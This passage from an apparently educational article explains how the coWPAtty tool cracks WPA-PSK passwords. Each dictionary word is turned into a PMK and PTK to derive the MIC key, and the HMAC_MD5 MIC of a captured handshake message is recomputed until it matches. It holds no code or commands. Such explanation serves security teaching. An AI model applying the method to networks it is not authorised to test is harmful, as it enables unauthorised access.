The Achilles Heel
coWPAtty is a password cracker. However, just like all password-cracking tools, it needs a target. In many cases, password crackers simply create a hash of a dictionary word and compare it to an existing password hash to see whether it matches. In other cases, such as this one, the target is not a simple hash of the original password. Instead, the target is buried several layers into the algorithm and requires significant work to attack.
The Achilles heel of WPA is the calculated MIC value that is used to validate messages 2–4 of the four-way handshake. In particular, coWPAtty targets the final EAPoL message; although any would work. Remember that this MIC value is created by passing the entire EAPoL message into an HMAC_MD5 hashing algorithm, which is secured by the MIC Key that was taken from the PTK.
Because both the MIC value (not the key) and the EAPoL message are passed as plaintext, an attacker can focus on the MIC hash value. The challenge is tied to the fact that an attacker must first convert the dictionary word to a PMK, using the correct algorithm with an accurate SSID value. Then the resulting value is plugged into another equation that also requires the MAC addresses and Nonce values of the supplicant and authenticator. The result of this calculation is the PTK, from which the attacker can strip the MIC Key. With this MIC Key, the attacker then performs the same HMAC_MD5 hash on the captured EAPoL message to see whether the selected password produces the same MIC as the captured MIC.
Sounds complex? This is why most of this article focused on the background of WPA-PSK. Imagine trying to explain this process without first describing the PMK, PTK, and their relationships to the MIC Key!
To help clarify how all this works, let's look at a step-by-step illustration revealing how a real four-way handshake can lead to a cracked password.